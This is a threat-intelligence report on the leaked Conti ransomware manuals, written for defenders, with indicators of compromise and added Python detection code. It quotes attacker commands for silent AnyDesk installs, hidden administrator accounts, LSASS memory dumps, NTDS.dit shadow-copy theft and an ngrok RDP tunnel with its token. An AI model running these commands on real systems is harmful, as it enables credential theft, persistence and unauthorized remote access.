Believed active since mid-2020, Conti is a ‘big game hunter’ ransomware threat operated by the threat group identified as Wizard Spider and offered to affiliates as ransomware-as-a-service (RaaS).
Following the lead of other big game hunter ransomware groups, Conti adopted the double extortion tactic, also known as ‘steal, encrypt and leak’, in order to apply additional pressure on victims to pay their ransom demands and avoid sensitive or confidential data being exposed.
Conti is infamously responsible for a large-scale ransomware attack on the Irish Health Service Executive (HSE). On August 5, 2021, a disgruntled Conti affiliate leaked an archive containing the group’s internal ‘manuals and software’ to a popular Russian-language cybercrime forum (Figure 1/Figure 2).
Figure 1 – Forum post detailing the Conti leak
Figure 2 – Google Translation (Russian to English)
The affiliate was seemingly upset at not receiving a cut of the profits. The leaked archive provides an insight into the tools, techniques and procedures (TTP) of the group and its affiliates, which are likely similar to the TTP used by other ransomware threat groups.
Later posts to this forum thread suggest that some attack tools were excluded from this leak, including a Mimikatz payload, used to evade antivirus solutions, and a ‘stealer’ payload, used to acquire credentials from browsers.
Additionally, the affiliate claims to hold information pertaining to the development of targets and a list of ‘teams’ although it is not clear if this list would expose high-ranking members of the Conti/Wizard Spider threat group.
Having reviewed this leak archive, the content appears authentic and, as such, the TTP are likely to be in current use by Conti as well as potentially other ransomware groups using similar methods.
This report provides a summary of indicators of compromise (IOC) identified from this analysis to allow defenders an opportunity to hunt for these threats within their organization’s network as well as proactively block or identify future intrusion attempts.
Payloads & Tools
Whilst some of the tools utilized by Conti are ‘legitimate’ commercial or open-source offerings, their unexpected presence and/or execution on an organization’s network may be indicative of nefarious use and should be investigated.
AdFind is a free Active Directory (AD) query tool used to gather information, such as hosts and users, from the target network, likely during the threat actor’s reconnaissance phase.
Aside from identifying additional hosts to target, the threat actor will attempt to determine high-value users from the information acquired using AdFind.
Specifically, documentation within the leak reveals that Conti classifies users as ‘Junior’, ‘Medium’ or ‘Senior’, with the group obviously seeking to identify the higher-privilege ‘Senior’ accounts. Furthermore, suggested departments of interest include those mentioning ‘Administration’, ‘IT’ and/or ‘LAN Engineering’.
In addition to the use of AdFind, which does not necessarily require administrative privileges to execute, the group will also use native commands such as:
NET GROUP "DOMAIN ADMINS" /DOMAIN
Notably, execution of the backup.bat script results in the following text files, containing AD information from a victim network, being created:
Additional scripts are also included within the leak, with script.sh seemingly being used to parse AdFind results:
The output of this additional script includes the following text files:
A script named p.bat may be used to ‘ping’ discovered hosts to determine if they are online:
Notably, this script will read the content of domains.txt and output results to
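The reconnaissance stage described above leaves a recognisable cluster of process-creation events on one host: AdFind execution, the NET GROUP "DOMAIN ADMINS" /DOMAIN query and a burst of pings from p.bat. Any one of these alone is routine administrator noise, so the following added example (written for this page, not code from the leak or the report) correlates them per host inside a short time window before raising a finding. The records are constructed Sysmon Event ID 1 style entries with assumed field names (ts, host, user, cmd); the ten-minute window and three-ping threshold are assumed tuning values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Tuning values are assumptions, not taken from the leak or the report.
WINDOW = timedelta(minutes=10)   # how long recon commands are correlated per host
PING_THRESHOLD = 3               # pings inside the window before they count as a sweep

# Command-line shapes documented above: AdFind execution, the DOMAIN ADMINS query, ping.
RECON_PATTERNS = {
    "adfind": re.compile(r'(?:^|[\\/\s"])adfind(?:\.exe)?\b', re.I),
    "domain_admins": re.compile(r'\bnet1?\s+group\s+"?domain admins"?\s+/domain\b', re.I),
    "ping": re.compile(r'(?:^|[\\/\s"])ping(?:\.exe)?\s', re.I),
}

# Constructed Sysmon Event ID 1 style records (fields assumed: ts, host, user, cmd).
SAMPLE_EVENTS = [
    {"ts": "2021-08-05T10:00:01", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "adfind.exe -f objectcategory=person"},
    {"ts": "2021-08-05T10:00:09", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "adfind.exe -f objectcategory=computer"},
    {"ts": "2021-08-05T10:00:40", "host": "WS-17", "user": "CORP\\jsmith", "cmd": 'NET GROUP "DOMAIN ADMINS" /DOMAIN'},
    {"ts": "2021-08-05T10:01:02", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "cmd.exe /c p.bat"},
    {"ts": "2021-08-05T10:01:03", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "ping -n 1 10.0.0.12"},
    {"ts": "2021-08-05T10:01:04", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "ping -n 1 10.0.0.13"},
    {"ts": "2021-08-05T10:01:05", "host": "WS-17", "user": "CORP\\jsmith", "cmd": "ping -n 1 10.0.0.14"},
    # Benign admin noise on another host, hours apart: single commands are not a finding.
    {"ts": "2021-08-05T11:30:00", "host": "ADMIN-01", "user": "CORP\\helpdesk", "cmd": 'net group "Domain Admins" /domain'},
    {"ts": "2021-08-05T12:45:00", "host": "ADMIN-01", "user": "CORP\\helpdesk", "cmd": "ping -n 1 printer-04"},
]


def classify(cmd):
    """Return the recon category a command line falls into, or None."""
    for name, pattern in RECON_PATTERNS.items():
        if pattern.search(cmd):
            return name
    return None


def qualifying(window):
    """Categories present in a host's window; pings only count once they look like a sweep."""
    counts = defaultdict(int)
    for _, cat in window:
        counts[cat] += 1
    cats = {c for c in counts if c != "ping"}
    if counts["ping"] >= PING_THRESHOLD:
        cats.add("ping_sweep")
    return cats


def detect_recon_bursts(events):
    """Slide a per-host time window over recon events; report when two or more
    distinct recon categories co-occur, and again whenever the set grows."""
    windows = defaultdict(deque)
    last_reported = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        cat = classify(ev["cmd"])
        if cat is None:
            continue
        ts = datetime.fromisoformat(ev["ts"])
        win = windows[ev["host"]]
        win.append((ts, cat))
        while win and ts - win[0][0] > WINDOW:   # expire events older than the window
            win.popleft()
        cats = qualifying(win)
        if len(cats) >= 2 and cats != last_reported.get(ev["host"]):
            last_reported[ev["host"]] = cats
            findings.append({"host": ev["host"], "user": ev["user"], "ts": ev["ts"],
                             "categories": sorted(cats)})
    return findings


if __name__ == "__main__":
    for finding in detect_recon_bursts(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed records, WS-17 is reported twice (once when AdFind and the DOMAIN ADMINS query co-occur, and again when the ping sweep joins them) while the isolated helpdesk commands on ADMIN-01 never reach the threshold.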
Antivirus Removal Tools
Albeit contained within a password-protected 7zip archive, a number of executables and scripts are seemingly provided to remove endpoint security solutions:
- Bitdefender 2019 Editions
- Trend Micro
  - trendmicro pass AV remove.bat
- Sophos
Additionally, this archive includes rootkit removal tools, potentially used to prevent third-party rootkits from impacting the group’s activity:
- GMER Rootkit Detector and Remover
- Epoolsoft PC Hunter
- PowerTool Antivirus & Rootkit Tool
Whilst specific file hashes for the above files cannot be determined from the encrypted archive, those deploying the tools may drop the entire archive onto a target host:
AV.7z
Cobalt Strike is a legitimate commercial tool, often used by red teams, that provides a post-exploitation implant named ‘Beacon’.
Typically delivered and reflectively loaded into the memory of an injected Windows process following the exploitation of some vulnerability, Cobalt Strike evades detection and provides numerous capabilities to a threat actor including command execution, file transfer, keylogging, Mimikatz credential gathering, port scanning, privilege escalation and SOCKS proxying.
Command and control (C2) communications utilize common protocols, including HTTP, HTTPS and DNS, likely to avoid anomaly detection by appearing alongside other legitimate network communications and, once deployed, the Beacon will attempt to periodically call home to a preconfigured C2 server.
The main Cobalt Strike archive includes the following files, many of which may also identify the presence of earlier versions of Cobalt Strike:
Additionally, a Cobalt Strike script used to query the Windows Registry for signs of antivirus software being installed may also be deployed:
C2 IP Addresses
Based on screenshots shared by the rogue affiliate, the following IP addresses were potentially previously used as Cobalt Strike command and control (C2) infrastructure:
Kerberoast is a Kerberos attack technique that allows an unprivileged user to gain access to service accounts by cracking NTLM hashes acquired from ticket-granting tickets (TGT) in memory. Brute-forcing these NTLM hashes can reveal a plaintext password, leading to privilege escalation.
In this instance, a PowerShell script from the Empire Project has been deployed for ‘Kerberoasting’.
Proxifier is a commercial tool that allows non-proxy-aware applications to proxy their network traffic through a SOCKS or HTTPS proxy.
Rclone is a legitimate open source tool used to synchronize and manage data on local, cloud and virtual file systems, seemingly used by the group for data exfiltration via the Mega.nz cloud storage platform.
Instructions provided to the affiliate describe how to copy data from victim hosts to a Mega cloud storage account and the use of a PowerShell script to process multiple network shares.
Launching the PowerShell script rclonemanager.ps1, a list of network shares is read from a file named 2load.txt and used with Rclone, which is executed in multi-threading mode. Additionally, the configuration file rclone.conf contains credentials for a threat-actor-controlled Mega account into which the data is uploaded.
Router Scan by Stas’M is a network audit tool used to identify devices and, using various exploits, gather data from network infrastructure devices.
Given the use of exploits, endpoint security solutions will likely identify this tool as malicious.
In addition to the identified binaries, ‘manuals’ within this leak identify the use of numerous native Windows and third-party tools. As such, the unexpected execution of the following commands may be indicative of nefarious activity.
Presumably acting as an additional method of remote access, a manual within the leak suggests the use of the commercial remote access tool AnyDesk to allow the threat actor to browse the file system of victim hosts as well as potentially to deliver additional payloads and/or exfiltrate data.
To simplify the use of AnyDesk, an example PowerShell script is provided that downloads the AnyDesk executable to C:\ProgramData\AnyDesk (Figure 3).
Figure 3 – Example PowerShell script used to download AnyDesk
Once downloaded, AnyDesk is then silently installed and an access password configured:
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
As observed in the group’s Remote Desktop configuration, an additional administrator account may also be configured, albeit likely using different values, along with hiding this account from the login screen by creating or modifying the
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
Finally, AnyDesk is executed with the --get-id parameter to obtain the ID required by the threat actor to gain remote access:
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
Conti Encryption Tool
Whilst the actual encryption tool is not included within the leak, documentation for the Linux version, potentially named encryptor, provides details of the tool’s options, including VMware ESXi capabilities:
- Encrypts files on the specified path. This is a mandatory parameter; the tool will not run without it.
- Kills all processes that interfere with file open operations.
- Logs all activity including errors.
- Turns off all VMware ESXi virtual machines.
- Used with the --vmkiller option, specifies VMware ESXi virtual machines that will not be turned off.
- Used with the
- Detaches the encryption process from the current terminal session so that it continues to run should the session fail.
As detailed in the rogue affiliate’s forum post, the Mimikatz attack tool was excluded from this leak although details of the group’s credential dumping methods are within the leaked manuals.
Specifically, the following commands are given as methods for creating a memory dump of the Local Security Authority Subsystem Service (LSASS) for later analysis and credential theft:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
Whilst not present within this leak, SoftPerfect Network Scanner is a commercial network administration tool available for both macOS and Windows.
Based on the manuals within this leak, this tool is used to gather information on hosts within a target network:
netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
It is likely that this tool would be deployed in its ‘portable’ format, rather than installed, along with the above-specified XML files. As such, the following files may be present:
Widely used by developers, ngrok is a legitimate service that allows the creation of secure tunnels that provide remote access to hosts within private networks, such as those behind firewalls and/or Network Address Translation (NAT).
Assuming the ‘free plan’ is used, execution of ngrok on a target host results in a randomly generated, temporary ngrok.io address being created to allow remote access via a secure HTTP/TCP tunnel.
Aside from nefarious use by threat actors, unauthorized tunnels should be discouraged given that they can bypass security controls and increase the attack surface of the organization.
In this instance, ngrok is used by the threat actor to simplify access to Remote Desktop services on Windows hosts, as determined by TCP port 3389, although in practice these parameters may vary:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
ngrok tcp 3389
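The AnyDesk deployment and hidden administrator account described earlier, together with the ngrok tunnel above, are remote-access persistence steps whose individual commands are easy to miss in isolation. The following added example (written for this page, not code from the leak or the report) links the net user, net localgroup and SpecialAccounts\Userlist commands by account name so that a hidden local administrator is reported as a single finding, flags the silent AnyDesk install, password set and ID lookup, and picks up ngrok both from its command line and from DNS queries for ngrok.io. The sample records are constructed, with assumed field names (type, host, cmd or query); a captured ngrok token is redacted in the finding rather than echoed.

```python
import re
from collections import defaultdict

# Command-line shapes documented above (case-insensitive, tolerant of quoting).
RE_NET_USER_ADD = re.compile(
    r'\bnet1?\s+user\s+"?([^\s"/]+)"?(?:\s+(?:"[^"]*"|[^\s/]\S*))?\s+/add\b', re.I)
RE_LOCALGROUP_ADMIN = re.compile(
    r'\bnet1?\s+localgroup\s+"?administrators"?\s+"?([^\s"]+)"?\s+/add\b', re.I)
RE_USERLIST_HIDE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?[^"]*specialaccounts\\userlist"?\s+/v\s+"?([^\s"]+)"?.*?/d\s+0\b', re.I)
RE_ANYDESK = re.compile(r'anydesk(?:\.exe)?\b', re.I)
RE_NGROK = re.compile(r'(?:^|[\\/\s"])ngrok(?:\.exe)?\s+(authtoken|tcp)\b(?:\s+(\S+))?', re.I)
RE_NGROK_DNS = re.compile(r'(?:^|\.)ngrok\.io$', re.I)

# Constructed records: process-creation events carry "cmd", DNS query events carry "query".
SAMPLE_EVENTS = [
    {"type": "process", "host": "FS-02", "cmd": r'cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent'},
    {"type": "process", "host": "FS-02", "cmd": r'cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password'},
    {"type": "process", "host": "FS-02", "cmd": 'net user oldadministrator "qc69t4B#Z0kE3" /add'},
    {"type": "process", "host": "FS-02", "cmd": "net localgroup Administrators oldadministrator /ADD"},
    {"type": "process", "host": "FS-02", "cmd": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f'},
    {"type": "process", "host": "FS-02", "cmd": r'cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id'},
    {"type": "process", "host": "WS-09", "cmd": "ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg"},
    {"type": "process", "host": "WS-09", "cmd": "ngrok tcp 3389"},
    {"type": "dns", "host": "WS-09", "query": "0.tcp.ngrok.io"},
    # Benign-looking: a build service account made local admin, but not hidden from logon.
    {"type": "process", "host": "BUILD-01", "cmd": "net user svc_build P@ss /add"},
    {"type": "process", "host": "BUILD-01", "cmd": "net localgroup Administrators svc_build /add"},
]


def detect_remote_access(events):
    """Return (host, finding, detail) tuples. Account stages are correlated by
    account name per host; everything else is reported per event."""
    accounts = defaultdict(lambda: defaultdict(set))   # host -> account -> {created, admin, hidden}
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "dns":
            if RE_NGROK_DNS.search(ev["query"]):
                findings.append((host, "ngrok_dns", ev["query"]))
            continue
        cmd = ev["cmd"]
        for rx, stage in ((RE_NET_USER_ADD, "created"), (RE_LOCALGROUP_ADMIN, "admin"),
                          (RE_USERLIST_HIDE, "hidden")):
            m = rx.search(cmd)
            if m:
                accounts[host][m.group(1).lower()].add(stage)
        if RE_ANYDESK.search(cmd):
            low = cmd.lower()
            if "--install" in low and "--silent" in low:
                findings.append((host, "anydesk_silent_install", cmd))
            if "--set-password" in low:       # password typically piped in on the command line
                findings.append((host, "anydesk_password_set", cmd))
            if "--get-id" in low:
                findings.append((host, "anydesk_id_lookup", cmd))
        m = RE_NGROK.search(cmd)
        if m:
            if m.group(1).lower() == "authtoken":
                findings.append((host, "ngrok_authtoken", "<token redacted>"))
            else:
                findings.append((host, "ngrok_tcp_tunnel", m.group(2)))   # the forwarded port
    # Account correlation is evaluated once all events for a host have been seen.
    for host, accts in accounts.items():
        for name, stages in accts.items():
            if {"created", "admin", "hidden"} <= stages:
                findings.append((host, "hidden_local_admin", name))
            elif {"created", "admin"} <= stages:
                findings.append((host, "new_local_admin", name))
    return findings


if __name__ == "__main__":
    for finding in detect_remote_access(SAMPLE_EVENTS):
        print(finding)
```

The account correlation is what separates the two hosts: BUILD-01 gets a lower-severity new_local_admin note, while FS-02, where the same account name also appears in the Userlist registry write, is reported as hidden_local_admin alongside the three AnyDesk findings.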
The NT Directory Services Directory Information Tree file, located in %WINDOWS%\NTDS.dit, acts as a database for Active Directory and contains valuable data including credentials.
As such, threat actors seeking to elevate their privileges within a network will attempt to acquire this file, although it is locked by default.
To work around this issue, Conti detail the use of the Windows Management Instrumentation command-line utility (WMIC) and the Volume Shadow Copy Service (VSS) administrative tool to create a Volume Shadow Copy of the system:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
net start "Volume Shadow Copy"
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Having created the shadow copy, the NTDS file and potentially sensitive Windows Registry hive files can be copied to another location for exfiltration:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"
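The MiniDump invocation in the credential dumping section appears three times, once directly and twice wrapped in wmic and psexec, and the NTDS.dit collection above is likewise wrapped in wmic. A detection that matches only the outermost command misses the wrapped forms, so the following added example (written for this page, not code from the leak or the report) peels the wrappers off first and then matches the innermost command for the comsvcs.dll MiniDump call, vssadmin shadow operations and copies of NTDS.dit or registry hives from a shadow copy device path. It also records the remote /node target and whether credentials were supplied inline with /password:, which is worth a finding of its own. The regexes are assumptions tolerant of the quoting seen on this page rather than a full Windows command-line parser; SAM is added to the sensitive hive set as the obvious sibling of SYSTEM and SECURITY; the sample command lines are the page's own, with PID left as the placeholder.

```python
import re

# Wrappers that carry an inner command: WMIC remote process creation, psexec in the
# "remote-exec psexec" form shown above, and the cmd /c shell. Regexes are assumptions
# tolerant of the quoting on this page, not a full Windows command-line parser.
RE_WMIC = re.compile(r'\bwmic(?:\.exe)?\s+(?P<args>.*?)\bprocess\s+call\s+create\s+"(?P<inner>[^"]*)"', re.I | re.S)
RE_WMIC_NODE = re.compile(r'/node:(?:"([^"]*)"|(\S+))', re.I)
RE_WMIC_PASSWORD = re.compile(r'/password:\S+', re.I)
RE_PSEXEC = re.compile(r'\bpsexec(?:\.exe)?\s+(\S+)\s+(.+)$', re.I | re.S)
RE_CMD_C = re.compile(r'^"?(?:[^"\s]*[\\/])?cmd(?:\.exe)?"?\s+/[ck]\s+(.*)$', re.I | re.S)

# Behaviours documented above, matched against the innermost command only.
RE_COMSVCS_MINIDUMP = re.compile(r'comsvcs\.dll\s*,?\s*minidump\s+(\S+)\s+(\S+)', re.I)
RE_VSS = re.compile(r'\bvssadmin(?:\.exe)?\s+(create\s+shadow|list\s+shadows)\b', re.I)
RE_SHADOW_PATH = re.compile(r'\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\([^\s"&]+)', re.I)
SENSITIVE_BASENAMES = {"ntds.dit", "system", "security", "sam"}   # SAM added as the obvious sibling

# The page's own command lines (PID kept as the placeholder), plus one benign-looking line.
SAMPLE_COMMANDS = [
    r'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full',
    r'wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"',
    r'remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full',
    r'wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"',
    r'wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"',
    r'vssadmin list shadows',   # routine on a backup host; reported low-severity on its own
]


def unwrap(cmd):
    """Peel remote-execution and shell wrappers, outermost first, until none match.
    Returns (innermost_command, context) where context records the remote target,
    the wrappers seen and whether a password was passed on the command line."""
    ctx = {"target": None, "inline_password": False, "wrappers": []}
    current = cmd.strip()
    while True:
        found = []
        for kind, rx in (("wmic", RE_WMIC), ("psexec", RE_PSEXEC), ("cmd", RE_CMD_C)):
            m = rx.search(current)
            if m:
                found.append((m.start(), kind, m))
        if not found:
            return current, ctx
        _, kind, m = min(found, key=lambda f: f[0])   # earliest match is the outermost wrapper
        ctx["wrappers"].append(kind)
        if kind == "wmic":
            node = RE_WMIC_NODE.search(m.group("args"))
            if node:
                ctx["target"] = node.group(1) or node.group(2)
            if RE_WMIC_PASSWORD.search(m.group("args")):
                ctx["inline_password"] = True
            current = m.group("inner").strip()
        elif kind == "psexec":
            ctx["target"] = m.group(1)
            current = m.group(2).strip()
        else:
            current = m.group(1).strip()


def analyze(cmd):
    """Unwrap a command line and report the documented behaviours found inside it."""
    inner, ctx = unwrap(cmd)
    techniques, artifacts = [], []
    if ctx["inline_password"]:
        techniques.append("credentials_on_command_line")
    m = RE_COMSVCS_MINIDUMP.search(inner)
    if m:
        techniques.append("lsass_minidump_comsvcs")
        artifacts.append(m.group(2))            # dump file path the responder should look for
    m = RE_VSS.search(inner)
    if m:
        techniques.append("vss_" + "_".join(m.group(1).lower().split()))
    for path in RE_SHADOW_PATH.findall(inner):
        if path.rsplit("\\", 1)[-1].lower() in SENSITIVE_BASENAMES:
            if "shadow_copy_sensitive_file" not in techniques:
                techniques.append("shadow_copy_sensitive_file")
            artifacts.append(path)
    return {"target": ctx["target"], "wrappers": ctx["wrappers"], "inner": inner,
            "techniques": techniques, "artifacts": artifacts}


if __name__ == "__main__":
    for command in SAMPLE_COMMANDS:
        print(analyze(command))
```

All three MiniDump variants reduce to the same inner command and the same finding, with the wmic and psexec forms additionally naming the remote target, which is where the dump file was actually written. The two DC01 lines each carry credentials_on_command_line in addition to the shadow copy activity, a reminder that WMIC /password: arguments end up in process-creation logs in the clear.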